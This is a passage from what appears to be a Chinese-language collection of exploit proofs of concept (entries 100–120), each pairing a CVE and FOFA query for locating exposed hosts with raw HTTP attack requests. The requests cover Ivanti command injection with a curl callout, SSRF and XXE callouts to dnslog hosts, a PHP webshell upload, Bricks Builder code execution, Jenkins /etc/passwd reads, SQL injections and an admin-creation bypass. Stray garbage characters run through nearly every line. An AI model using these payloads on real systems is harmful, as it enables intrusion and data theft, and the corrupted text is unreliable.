: H6 l$ z4 r8 ]7 VHost: 192.168.40.130:80800 Z* P1 N. ^& j) u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 A) _% U: c1 G3 PConnection: close6 b, j+ B2 ^* F1 ]) g& v; D
Content-Length: 154
( m7 E( V0 g' U1 G4 v" R0 P. P* _Accept: */*
- R/ X! f! U+ A. ]/ y1 VAccept-Encoding: gzip, deflate; g, L$ w2 {' z7 ~% V5 ?/ o8 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 B/ q" g, n& H" M# T
Content-Type: application/x-www-form-urlencoded; charset=UTF-8; x; Y- m ^2 F6 r$ S) r
X-Requested-With: XMLHttpRequest; ]2 ?; Y/ }+ V
8 M+ ^: c6 |/ }, @%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
' k! e# G( e# T8 t9 c2 r8 S
5 _! F# `. P3 N9 n9 ~+ B% i, S' a. d; H( T4 r( c
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传! x# C# k! [5 J$ K2 l
CVE-2024-0352. W( z2 e9 y6 ?9 S7 ?
FOFA:icon_hash="874152924"2 U/ h* d( p. G3 P1 O5 o. B; \$ J
POST /api/file/formimage HTTP/1.1
* w7 A1 P0 ?8 zHost: 192.168.40.130: l2 F* u5 m/ K
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" p ]3 |" r$ s1 }Connection: close, X) Z; A+ p2 z7 I. k/ U
Content-Length: 2012 R5 t& O9 f, E% h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei) a' h* O5 \! Y: n0 j
Accept-Encoding: gzip3 U6 @1 v7 o& n* p5 m( F) l& p8 F
2 o9 H. P" A, W------WebKitFormBoundarygcflwtei% a0 \8 Z. i6 `$ t9 z7 L
Content-Disposition: form-data; name="file";filename="IE4MGP.php"* I; I1 B, E- v& o. U
Content-Type: application/x-php
0 u$ ?1 N: M4 `2 X1 P# V& s+ E" T) s* r% c( a& f6 ^. u: M
2ayyhRXiAsKXL8olvF5s4qqyI2O% d# R1 R- k- ~
------WebKitFormBoundarygcflwtei--
/ ?! \# Z; l, V8 Y
" N. u/ X1 \4 {. C0 W: y8 y0 y! X/ q+ v
101. ivanti policy secure-22.6命令注入) H1 b8 @ u- P4 }1 V7 I
CVE-2024-21887
, Q/ H; B" }3 U3 u* R' x z/ gFOFA:body="welcome.cgi?p=logo"
}" ~+ ?! M5 Q+ Y! m" |" UGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' S9 }9 P7 A/ N4 @
Host: x.x.x.xx.x.x.x7 U K$ F6 {0 r; E4 W5 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( J& q2 r% }) m2 `! \) w
Connection: close
9 O0 [; x3 \3 ^% o" g7 Z8 RAccept-Encoding: gzip6 Q+ `+ p0 o' Q! Q
, o! l/ E- x2 v' G
7 W1 x/ [3 @- Q' [3 D102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行8 R7 k' G5 u0 t& J$ B
CVE-2024-21893& h$ {/ B; z) y1 d$ W* V
FOFA:body="welcome.cgi?p=logo"( I, y& D j* o, B; s4 ~
POST /dana-ws/saml20.ws HTTP/1.1
- B; v6 i: W( j1 L9 T1 g+ aHost: x.x.x.x4 `$ w+ H) I$ t; s+ I! J; y: [( e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! B: T" o8 w# \# X6 q/ L; zConnection: close3 _3 q' a$ j* x, V' w
Content-Length: 792) P9 b! d7 @- D* {2 ~
Accept-Encoding: gzip
8 h$ _9 b: g8 [$ X- S0 F8 N& A- O$ F/ c
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>( J$ Z* B3 j# Q; d9 x& n
, M' J( J, I3 e: t q b
103. Ivanti Pulse Connect Secure VPN XXE
3 T' u9 g& t1 x0 ]( X* W4 B: yCVE-2024-22024% k* ?- T+ N! h
FOFA:body="welcome.cgi?p=logo"2 b: ?0 u6 `# C: s. K9 b
POST /dana-na/auth/saml-sso.cgi HTTP/1.1! c! X: s# F9 F1 n+ p
Host: 192.168.40.130:111' e. d9 I& C2 h2 t6 a* ^- [/ a
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ X( m9 H' f" ^3 V0 M
Connection: close% I% o3 E* ?+ n6 _
Content-Length: 204
/ y8 _. u, V& L! o$ e; U4 O% `9 GContent-Type: application/x-www-form-urlencoded: l9 H+ g! C/ t3 B
Accept-Encoding: gzip; @# U1 U1 @0 D' H
3 P4 o. S/ \* ]( P
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
8 s4 [% t# B- ^) H" l, @
+ m& H% u8 J2 y+ W- o! I/ h F+ _4 }) ~% ]) |8 q. H% s# G* ]; W
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下4 v% ~3 F/ u1 L
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>" @7 x) h1 a1 [' W8 M1 \5 T
' x+ ~& W2 I+ O" ?
- O+ G+ G2 j$ V3 M/ |104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
8 \$ r" w# |9 B2 q* C0 I2 P1 gCVE-2024-0569
! I6 H8 ` [* B8 HFOFA:title="TOTOLINK"9 s+ p" _4 `: ]4 g! N: x
POST /cgi-bin/cstecgi.cgi HTTP/1.1
4 i6 x" v6 m" O+ ZHost:192.168.0.1) ?7 E4 V, x. m( z# _3 ]
Content-Length:41# X: c+ J- K2 ?
Accept:application/json,text/javascript,*/*;q=0.01( J J2 T% P4 t, W6 Q D1 u
X-Requested-with: XMLHttpRequest
: C, ?3 b z7 z2 I4 p9 KUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
) C- z' y* H4 GContent-Type: application/x-www-form-urlencoded:charset=UTF-8
% G- c! A# h- p$ c' J6 [Origin: http://192.168.0.1
, k# |7 G( r0 s! pReferer: http://192.168.0.1/advance/index.html?time=1671152380564
2 w2 D- J: V1 v) ^) |! ?* SAccept-Encoding:gzip,deflate
+ V" s2 h% t' k! W0 l/ w5 w& KAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7* R4 q$ ^& N+ i( ?- V7 ?3 @
Connection:close0 [( E0 [! V# C3 z" u1 {0 }, g4 Y' b
8 ]) p$ X" k+ x& @' ]" _7 ?{
4 b5 E2 t% P( e; J"topicurl":"getSysStatusCfg",; m4 A' y# Z2 p+ A& t
"token":""
* F$ w2 l/ `5 s1 W1 D, _, w}
3 A! e! B) _5 X. X2 Y% R; _- k4 j& t) \& W# }7 ^3 {
105. SpringBlade v3.2.0 export-user SQL 注入0 K2 ]; m0 X8 M; j
FOFA:body="https://bladex.vip"8 u2 @- L- ^1 ~6 B
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
! t( C& A, j7 c; m, w
% s0 W( }/ E$ G3 U* H' k106. SpringBlade dict-biz/list SQL 注入
, W% l; t8 I% l3 fFOFA:body="Saber 将不能正常工作"# L+ p k$ A3 k( @
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
1 T( I: V/ [8 y3 ]5 \- t. xHost: your-ip
4 A4 G6 f6 i! E8 H4 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 _! F+ m. A/ u. O0 v! W
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A2 i2 m1 b6 Y5 m4 T( r! v. @
Accept-Encoding: gzip, deflate
/ n/ ]* w8 X8 _) F. UAccept-Language: zh-CN,zh;q=0.9; P( Y+ ?) V' U0 c
Connection: close
3 V% J- B. R1 [/ k% j: R8 {% x$ ?& i
' e6 B$ z$ b, [( [3 G# {3 l) e107. SpringBlade tenant/list SQL 注入; ?8 d; Q+ C: i1 b; T' _4 P
FOFA:body="https://bladex.vip"
# @" `7 v; F: R" ^/ oGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& [* b: X1 }' h) [5 _6 H$ j8 x# h
Host: your-ip a6 R R9 I: L |' M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. i) q9 ~* R+ D. OBlade-Auth:替换为自己的4 k1 g \# w. n7 I( j5 t
Connection: close8 E) M( X. V/ ^. V* z
$ B* r& B. ]! d* d" C: b' O
0 D! L6 U/ z5 r9 I5 M# l) N108. D-Tale 3.9.0 SSRF! @3 w0 [& I* M) \3 e
CVE-2024-21642& C0 U+ r, u9 \/ X" g1 ]$ M; l
FOFA:"dtale/static/images/favicon.png". J- S/ \( d7 ~8 s: U9 v$ b5 T# a4 D
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1$ w$ ~( E* Y. g/ p3 m
Host: your-ip6 B1 _: G( f: k+ s E" O
Accept: application/json, text/plain, */*
1 o7 I; t3 B% s3 x2 }) p6 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# m2 V9 Q9 i& `) ]- _
Accept-Encoding: gzip, deflate' c: U' } ?; ]( _7 V# u3 Y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ p) J. p0 u9 Q2 f) p, {Connection: close! N$ a0 M) S3 W
* N4 ~! i; K+ p2 r6 C
/ Q" b, A" c- |4 s
109. Jenkins CLI 任意文件读取
/ z% ?% F, d- C: ~" D- ?: yCVE-2024-23897
, K5 C: _) O k: T/ bFOFA:header="X-Jenkins"
% Q! ^, D D% n: T( D- ?. k, APOST /cli?remoting=false HTTP/1.1# A: Y* \7 m' M% ]- |, y
Host:
, l$ y; r7 U- E aContent-type: application/octet-stream
$ d% P2 q* h& Y" d" v$ U8 |/ HSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" t5 D( z3 N' M- c' oSide: upload
9 G) w0 ]9 f5 W- _: |3 M" iConnection: keep-alive+ p, ?+ ?0 P9 H" P; q7 q
Content-Length: 163" x7 U1 _+ U4 r; F& |( X8 s
`0 a' m" I! ^5 }5 h* I5 G$ y/ o) o
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'& x+ `: k& b, G b3 }' i5 z& \
% X* F% K8 N j6 P) v
! w7 o6 n, I R( t8 w' \; l9 q& C
POST /cli?remoting=false HTTP/1.1
8 i: l% ^& ^5 ^7 Q) @ VHost:
( l$ Z0 A4 a5 s( CSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
/ i; A2 G: S" X7 s1 w& udownload, \: l- L/ d% E: y" t3 V
Content-Type: application/x-www-form-urlencoded
$ [0 L* q4 x c5 o9 O. _Content-Length: 0) C5 N: ]2 \/ S `
5 t9 O x. j3 {+ g0 s) @' @6 n, A# Y; ~
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin6 [% p, p5 \( `! p; H. l$ B
java -jar jenkins-cli.jar help
( s U/ W5 I( {' z[COMMAND]
, Y3 K$ G% E! F6 Y& B. S& m9 `1 Y- CLists all the available commands or a detailed description of single command.$ u* ]) u/ l; n: I" e0 m3 y) s# T% @
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)& B* y/ x. O, c/ G6 W0 a
6 Q! H1 \. k% M. ^7 Y/ w6 m e
; L3 T. o- {6 L
110. Goanywhere MFT 未授权创建管理员
, H9 G6 S* Y" ?- G; |CVE-2024-0204
3 |4 ^5 l3 T. L4 i" AFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932") i8 T5 R3 v" z5 U: q
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.10 i1 z$ }/ K7 d% a3 g2 X
Host: 192.168.40.130:8000
3 [8 I- f( r9 R6 p# k) ^* o$ S2 wUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
9 A. ]2 |- x; a( ^Connection: close
9 O$ t3 Q, h/ c# m3 sAccept: */*
# ~6 D! K6 }0 ~3 PAccept-Language: en
' C0 E; t' H" j, ?Accept-Encoding: gzip/ p. L8 g' v/ o
6 l } J! F) r5 D4 h" @# t* x
) w4 s4 g8 M5 `111. WordPress Plugin HTML5 Video Player SQL注入
5 R2 J0 ^$ Z5 h1 f- j& f9 DCVE-2024-1061/ ^3 ]: S: ]9 m" B' p
FOFA:"wordpress" && body="html5-video-player"/ q9 v3 a2 G1 D6 H
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ w( m" T/ o1 N' o3 B8 ^# o4 X
Host: 192.168.40.130:112$ q+ ?2 J1 ]3 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# S' N( D- A/ l5 V: r o2 W
Connection: close
$ f2 n- R, c. ^% B2 EAccept: */*5 I" y- [( n ^) T
Accept-Language: en8 w3 J# u0 {/ q
Accept-Encoding: gzip; d3 w, ? X3 ~) @3 j) H
, `( D3 h# F3 z, Q; e
) W0 W/ }/ _* m* v+ }
112. WordPress Plugin NotificationX SQL 注入& @- b& J% w% Z# u! }: N
CVE-2024-1698
; {: b, X5 V1 z; g- NFOFA:body="/wp-content/plugins/notificationx"
- k$ b) h9 v. ^1 R GPOST /wp-json/notificationx/v1/analytics HTTP/1.1. a; {* i* l1 M: P. @, o
Host: {{Hostname}} [2 q/ K& @9 g2 i# ^ C
Content-Type: application/json
# K$ k; U- i5 A1 N% Z: L0 ]% ]" f
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
. L1 i/ J% G# z1 T' G0 ]1 B @1 U; |! n- k
, m1 W# I6 I: H6 V/ ^# z
113. WordPress Automatic 插件任意文件下载和SSRF! u$ g' T% k/ L" v6 x7 w
CVE-2024-27954
1 }9 `* J* \* _& Q6 M6 B UFOFA:"/wp-content/plugins/wp-automatic"5 q8 P l/ o/ E$ K* o" ?- t8 Z$ _
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.18 p/ a% n. y3 ?5 n5 ]- r. B/ j6 u
Host: x.x.x.x! e f, P6 M5 Q& l1 S7 p* O
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
) P% o% e6 {4 A7 F* S8 {! I5 vConnection: close! h. b0 J) H. J5 u$ |# l6 l+ b6 _
Accept: */*
8 X3 N. }9 |( v! @- q6 {9 s4 dAccept-Language: en
: V. \9 P" g" m1 ]9 Z8 T9 }+ s; UAccept-Encoding: gzip* M; Y4 O% g7 h4 f: m
- q# w9 L8 b9 k3 E. T2 `) B" n* P
+ i, J; q6 N$ u, L114. WordPress MasterStudy LMS插件 SQL注入
2 J& H* B/ C6 k6 ^5 u* nFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"$ G5 K) Y% o8 T
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" W7 q$ R" U" {6 w( y1 V0 T
Host: your-ip; L3 B1 t7 h' p" ^, d2 J
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ d' A- s' o- s/ e5 ?4 o
Accept-Charset: utf-8
! ?# T& c+ W( u+ p9 l; jAccept-Encoding: gzip, deflate
0 \0 c _* g L0 t, m( EConnection: close
' q0 M+ _% F2 p7 @3 B
' | e: A# f& O O5 I! j; |0 N) V9 B/ T
115. WordPress Bricks Builder <= 1.9.6 RCE- c. ~' O+ x! B; N
CVE-2024-25600
9 s1 [/ S5 w% qFOFA: body="/wp-content/themes/bricks/"* A2 A1 L: l' W7 Y6 Q# p
第一步,获取网站的nonce值
9 i, @5 @& L, dGET / HTTP/1.1) J* @' q- F) F1 y$ c, a' ]3 o
Host: x.x.x.x( Q3 M" z8 W Q& n- B* i
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
9 i/ B/ d- ]* a* FConnection: close
; k9 L1 s; ~5 q$ c4 u' FAccept-Encoding: gzip0 E* d5 R) G% r: c& g4 D" I8 d; ]0 Y
3 V% D( T( z. e5 H5 B9 X
8 L" Q: I6 ~) D% b第二步替换nonce值,执行命令2 ~% i5 @2 l" c7 Y0 x9 l. U$ c
POST /wp-json/bricks/v1/render_element HTTP/1.1
$ B/ J9 S: _, J% r- K" h0 aHost: x.x.x.x
! X7 @8 J! ^" Y( k* e/ d0 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ q$ _' H9 f: `4 V$ Z7 C/ j1 s" TConnection: close
; e- H" G9 t1 w, o$ D) i/ cContent-Length: 356
) p4 e1 r3 f0 p- Y" o7 OContent-Type: application/json
0 g" R/ E, V2 s5 IAccept-Encoding: gzip$ F( S/ k9 o* i3 @3 a/ c1 q7 C
; i1 w9 e7 E. }4 F1 l _- M
{
9 C! k- c& ?0 w) ]& b"postId": "1",
4 r( ^4 g1 T4 {" k H' t6 k$ R* P "nonce": "第一步获得的值",1 s1 W+ W: |) ]% p- ^4 j! U5 Q
"element": {
& w7 @1 U6 y/ V/ P' v; a "name": "container",7 T& o( ]! Y# n) o3 }
"settings": { e8 ?/ t9 N4 t1 g" E) A7 y
"hasLoop": "true",
, ]& w( F$ q: _0 Y2 J! _) P "query": {
Z' A* L5 ~4 k "useQueryEditor": true,2 |- e0 m- s' C
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",9 x$ y2 s* O9 w) K, E7 I' Q
"objectType": "post"" R" Y, C; C$ {* }* @/ C V" N& f2 x
}4 C/ a: ?( f x7 ^3 T. o* S* M( d
}* B4 ~, I! a' d u L$ ^0 p
}
) \" j- O$ F9 l e3 f/ |/ ?}
$ l) g! D- s, ?, O4 V1 l
W; W8 Q o# q1 Y% E9 U9 F' f, i
/ \1 j, t1 Z! `- I4 Z116. wordpress js-support-ticket文件上传
$ b( F# p! h; z" P6 yFOFA:body="wp-content/plugins/js-support-ticket"# e% N2 j: s3 J2 U
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1 e% d5 y/ `9 L; `
Host:
" D3 ?# {0 u' eContent-Type: multipart/form-data; boundary=--------767099171
* o- B/ O) n$ W% h4 @6 S( h! ]9 wUser-Agent: Mozilla/5.0- U' J( O8 X& y3 ^
) Z6 ?. |. ~; `1 n- |- X
----------767099171- h5 `; }. X; y* R1 d# S7 l
Content-Disposition: form-data; name="action"
4 h- e% G0 A# v. k$ d: Y( aconfiguration_saveconfiguration
: C' R) M" q! ?6 \; D" L y5 o* d----------767099171
" }2 w- k" k6 i* X4 Y; Y) z, uContent-Disposition: form-data; name="form_request"* h3 S9 T2 q8 d
jssupportticket
* |' R3 `7 e0 f; S6 W0 }' b* S* R----------767099171+ O5 q3 F O0 l. c7 K
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": A+ l# {/ {! O/ { |& x
Content-Type: image/png
% ]. `! y# G) ]- t; w+ L( {( k----------767099171--7 ?7 j, @" p% t4 `4 H3 T
. p0 K0 N$ |9 n9 z- v( U
: |9 t8 w8 {. Y) C. L117. WordPress LayerSlider插件SQL注入: H. w" z/ Q4 G
version:7.9.11 – 7.10.0) ]+ o! D2 x- R- [
FOFA:body="/wp-content/plugins/LayerSlider/"
: m0 }" B9 a2 d- @2 m( H4 wGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1$ I& t9 E$ N8 E$ x2 p/ p# X" ~$ J
Host: your-ip
7 |. [) G1 l$ U4 A2 |$ N: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& ~0 ]1 f3 O7 ]8 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ P# Y1 ?: U( SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 Q% u% h) L* Z$ L d) SAccept-Encoding: gzip, deflate, br1 \ s) @: ?$ _; {* g
Connection: close
N. s: |1 ^4 e0 x% v/ ]3 `Upgrade-Insecure-Requests: 1
4 C% g- o/ ]$ M8 [+ i) Z
S- Q0 S9 e5 I8 N! h
5 d! a' n7 |% C: I9 B5 ]9 U118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
5 a. ?9 X# V+ n N9 s' u: ?CVE-2024-0939# K6 F$ X2 Y3 g
FOFA:title="Smart管理平台"; d6 A& ~3 j" I
POST /Tool/uploadfile.php? HTTP/1.1
0 a5 l2 @& }: BHost: 192.168.40.130:8443
x) E- W5 \* a3 J! UCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8$ H1 X1 m& G, s& [& J1 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' Q9 I' {+ {( {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% m9 [' z6 `: ~/ r' d, R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 [' r9 ?3 w! GAccept-Encoding: gzip, deflate
; H* m( F1 ^* xContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
- L1 L9 G9 k# \0 X5 T- O- AContent-Length: 4051 E/ L4 B4 \. W2 {( G) Z1 ?+ h/ X* ~
Origin: https://192.168.40.130:8443, ^0 |9 L8 G$ f
Referer: https://192.168.40.130:8443/Tool/uploadfile.php3 W0 r/ a+ B U0 y
Upgrade-Insecure-Requests: 1
$ X- P3 B! a9 p- m8 qSec-Fetch-Dest: document
2 ? R) _6 y V2 R( M2 ^7 wSec-Fetch-Mode: navigate" f; i3 O5 [, Q" u0 {+ M
Sec-Fetch-Site: same-origin
; r4 s0 x; n8 ]& t' H" LSec-Fetch-User: ?1
2 f' _8 O9 h; h, q6 D9 \+ mTe: trailers
& D% B" \9 d8 f- A& eConnection: close
6 c% S8 E1 u* F) x. p
4 w% T- w5 k/ I-----------------------------13979701222747646634037182887: i& j: s( Q& I1 Q* y
Content-Disposition: form-data; name="file_upload"; filename="contents.php"; {' A# ~( r7 c# `; o" ~
Content-Type: application/octet-stream3 M) a, Q, z h4 b, F! {
9 e8 w9 z7 n9 D6 O# n! J<?php2 H& Q. L) o$ V# ~" }1 o# Y/ ~
system($_POST["passwd"]);
3 d- E1 L4 M* K?>& I+ j. h& Q7 k9 O3 R
-----------------------------13979701222747646634037182887
# T- n3 W6 M" S- Y4 I6 x8 YContent-Disposition: form-data; name="txt_path"
$ |9 f8 J+ M' O- B. j" v/ V, z \' @ R* v# R
/home/src.php1 u/ l4 l% l7 l6 {9 g* R
-----------------------------13979701222747646634037182887--
* R3 X! y+ E4 x
* p$ |' Z+ z& X2 H9 R- ^- c. Z: j5 z
, M$ s# C& I* [5 b& W1 S访问/home/src.php$ C9 p! o$ O& u# i! H% v
$ W% M0 N. `1 ]9 M! q! @5 v7 m119. 北京百绰智能S20后台sysmanageajax.php sql注入
6 P3 [8 b: ]& |- TCVE-2024-1254
: M- D2 T# J/ D' kFOFA:title="Smart管理平台"
2 O4 s! G5 X% e& U3 x' @( e先登录进入系统,默认账号密码为admin/admin! r( Z2 d& a. H& w5 b
POST /sysmanage/sysmanageajax.php HTTP/1.11& y5 ~2 e) I9 B
Host: x.x.x.x
1 f' R. N" e) _4 e9 QCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee6 N. C6 B! y9 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.04 E0 T/ k ^ X7 \- Y* _# o
Accept: */*- @) z+ G. j" e8 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ], a( e/ x/ j& m8 _ j1 `
Accept-Encoding: gzip, deflate
2 c- l0 h" r) HContent-Type: application/x-www-form-urlencoded;; J- V3 a8 l& N1 u3 ~$ }
Content-Length: 109" m& d; u- ?: S' K: d2 S
Origin: https://58.18.133.60:8443
& ]$ J! S4 o4 z( JReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
( g' ~$ x& _7 q# d$ k# L$ LSec-Fetch-Dest: empty8 E. n5 R" M. b% J3 M l) i
Sec-Fetch-Mode: cors
/ O+ y5 ~, p6 _6 ^* HSec-Fetch-Site: same-origin/ k) b! A. X$ ^5 `: P% o- j
X-Forwarded-For: 1.1.1.1
0 c: e7 v+ C- @X-Originating-Ip: 1.1.1.1- Q( }: L4 p1 S6 J' U! n$ i
X-Remote-Ip: 1.1.1.12 G5 I7 N8 P% p% u5 C* Q, y8 D
X-Remote-Addr: 1.1.1.1
2 l9 C6 |# e, P3 _+ KTe: trailers
. O5 k3 I9 Z9 `* V( r: A6 D- SConnection: close$ d4 ~" M: N7 U" p" i( A! S9 `
1 Y5 E9 v8 M2 n8 @ }7 e/ C% _
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
3 i) E1 r( J. z) R0 g; @# p/ l
- S# u4 z! g; }
% k- h0 n: j3 d4 W120. 北京百绰智能S40管理平台导入web.php任意文件上传2 [9 l; k# n0 w& A2 y8 A9 B" W! Q
CVE-2024-1253. T' F6 `6 x' ~( a, {; z
FOFA:title="Smart管理平台"
2 @( ?) K6 K- T' {, s2 u9 s3 Z9 mPOST /useratte/web.php? HTTP/1.18 F8 M4 a8 S \/ w, r7 u3 P! I
Host: ip:port
" {' c* G! v. f0 o- P, RCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
